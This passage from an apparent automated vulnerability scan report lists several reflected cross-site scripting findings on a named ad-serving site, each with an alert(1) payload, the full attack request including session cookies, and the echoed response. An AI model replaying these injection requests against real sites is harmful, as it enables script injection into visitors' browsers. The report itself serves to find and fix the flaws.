Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 836c5'-alert(1)-'8ada2bb0818 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133836c5'-alert(1)-'8ada2bb0818/no?http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href= HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; pdomid=13; pid=6525761750539601382; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:59:28 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
e('http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=http://www.meetic-partners.com/diff/58/673819/go140.asp?673819%3B97831%3B6525761750539601382%3B247433133836c5'-alert(1)-'8ada2bb0818%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24
...[SNIP]...

2.185. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no [http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no

Issue detail

The value of the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 701ed'%3balert(1)//28f11ddf22f was submitted in the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter. This input was echoed as 701ed';alert(1)//28f11ddf22f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no?http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=701ed'%3balert(1)//28f11ddf22f HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; pdomid=13; pid=6525761750539601382; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:58:42 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<param name="flashvars" value="target=_blank&clicktag=' + escape('http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=701ed';alert(1)//28f11ddf22fhttp://www.meetic-partners.com/diff/58/673819/go140.asp?673819%3B97831%3B6525761750539601382%3B247433133%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2
...[SNIP]...

2.186. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eafc8'%3balert(1)//d51e789b63c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eafc8';alert(1)//d51e789b63c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no?http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=&eafc8'%3balert(1)//d51e789b63c=1 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; pdomid=13; pid=6525761750539601382; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:59:17 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=&eafc8';alert(1)//d51e789b63c=1http://www.meetic-partners.com/diff/58/673819/go138.asp?673819%3B97831%3B6525761750539601382%3B247433133%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B
...[SNIP]...

2.187. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bd6e'-alert(1)-'ffbf5d29f3e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/978318bd6e'-alert(1)-'ffbf5d29f3e/673819/MSN_uk.meeticcorp/300x250/392249101/no?http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href= HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE; pdomid=13; pid=6525761750539601382

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:59:36 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=http://www.meetic-partners.com/diff/58/673819/go138.asp?673819%3B978318bd6e'-alert(1)-'ffbf5d29f3e%3B6525761750539601382%3B392249101%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3
...[SNIP]...

2.188. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ab7'-alert(1)-'0c818bb51b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/39224910186ab7'-alert(1)-'0c818bb51b/no?http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href= HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE; pdomid=13; pid=6525761750539601382

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:59:41 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
f="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=http://www.meetic-partners.com/diff/58/673819/go141.asp?673819%3B97831%3B6525761750539601382%3B39224910186ab7'-alert(1)-'0c818bb51b%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24
...[SNIP]...

2.189. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no [http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no

Issue detail

The value of the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97560'%3balert(1)//13ee165c502 was submitted in the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter. This input was echoed as 97560';alert(1)//13ee165c502 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no?http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=97560'%3balert(1)//13ee165c502 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE; pdomid=13; pid=6525761750539601382

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:58:57 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<param name="flashvars" value="target=_blank&clicktag=' + escape('http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=97560';alert(1)//13ee165c502http://www.meetic-partners.com/diff/58/673819/go140.asp?673819%3B97831%3B6525761750539601382%3B392249101%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2
...[SNIP]...

2.190. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8bec'%3balert(1)//b4371b6b088 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8bec';alert(1)//b4371b6b088 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no?http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=&a8bec'%3balert(1)//b4371b6b088=1 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE; pdomid=13; pid=6525761750539601382

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:59:31 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<param name="flashvars" value="target=_blank&clicktag=' + escape('http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=&a8bec';alert(1)//b4371b6b088=1http://www.meetic-partners.com/diff/58/673819/go140.asp?673819%3B97831%3B6525761750539601382%3B392249101%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B
...[SNIP]...

2.191. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b46e'-alert(1)-'4a2054d239f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/978316b46e'-alert(1)-'4a2054d239f/673819/MSN_uk.meeticcorp/300x250/877134046/no?http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href= HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; pdomid=13; pid=6525761750539601382; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:59:24 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=http://www.meetic-partners.com/diff/58/673819/go138.asp?673819%3B978316b46e'-alert(1)-'4a2054d239f%3B6525761750539601382%3B877134046%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3
...[SNIP]...

2.192. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b969'-alert(1)-'7fd789453ef was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/8771340467b969'-alert(1)-'7fd789453ef/no?http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href= HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; pdomid=13; pid=6525761750539601382; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:59:30 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
f="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=http://www.meetic-partners.com/diff/58/673819/go138.asp?673819%3B97831%3B6525761750539601382%3B8771340467b969'-alert(1)-'7fd789453ef%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24
...[SNIP]...

